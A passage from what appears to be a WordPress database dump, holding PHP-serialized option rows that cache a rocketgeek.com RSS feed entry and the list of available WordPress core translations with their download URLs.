Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://rocketgeek.com/tips-and-tricks/push-user-directly-to-paypal/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n \n \n\n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"Force user to update data before using the site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://rocketgeek.com/tips-and-tricks/force-user-to-update-data-before-using-the-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Dec 2015 18:03:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:15:\"Tips and Tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:17:\"template_redirect\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:20:\"wpmem_login_redirect\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:22:\"wpmem_post_update_data\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:19:\"wpmem_register_form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"http://rocketgeek.com/?p=9102\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:314:\"This code example is similar in both the code used and the concept as what was outlined in Force User to Update Password from Randomly Set Password. The main difference here is that we are looking for the user to update required user fields that may not yet be complete. This may be useful in situations […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:27:\"http://rocketgeek.com/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:7:{s:4:\"date\";s:29:\"Mon, 07 Mar 2016 19:59:16 GMT\";s:6:\"server\";s:6:\"Apache\";s:4:\"etag\";s:34:\"\"0d8b3ef161bedaeb9cd2e7ba8f344e22\"\";s:4:\"link\";s:93:\"<http://rocketgeek.com/wp-json/>; rel=\"https://api.w.org/\", <http://rkt.bz/Jn>; rel=shortlink\";s:13:\"last-modified\";s:29:\"Mon, 07 Mar 2016 15:05:17 GMT\";s:10:\"connection\";s:5:\"close\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(13066,'_transient_timeout_feed_mod_5a25458da46a336967a55e430a3eace5','1457423940','no'),(13069,'_transient_feed_mod_5a25458da46a336967a55e430a3eace5','1457380740','no'),(13180,'_site_transient_timeout_available_translations','1457466473','yes'),(13183,'_site_transient_available_translations','a:56:{s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-21 15:46:45\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:15:41\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:19:26\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:22:\"Продължение\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:22:49\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-22 06:13:16\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-08-17 08:13:27\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:32:23\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Fortsæt\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:34:24\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:36:24\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/4.1.8/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:38:25\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Fortfahren\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-07-24 12:08:43\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:44:26\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:42:35\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:46:15\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:48:12\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-24 16:07:13\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/es_MX.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:56:31\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/es_PE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 14:50:12\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/es_ES.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"es\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-04 19:47:01\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.0/es_CL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"es\";i:2;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-27 08:55:29\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:03:17\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-08-18 09:17:59\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-08-19 16:34:31\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:19:\"2014-09-05 17:37:43\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.0/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:14:57\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:20:27\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1.8/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-08 22:28:26\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"להמשיך\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:25:25\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-09-15 15:59:46\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Tovább\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:29:34\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-22 13:36:50\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:33:39\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:35:42\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"続ける\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-20 11:48:55\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:47:56\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:57:42\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ေဆာင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 15:59:41\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:02:30\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-04-16 06:38:46\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:07:08\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-29 22:19:48\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.1.8/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"دوام\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:14:41\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-26 16:11:07\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.8/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"4.1.8\";s:7:\"updated\";s:19:\"2015-03-27 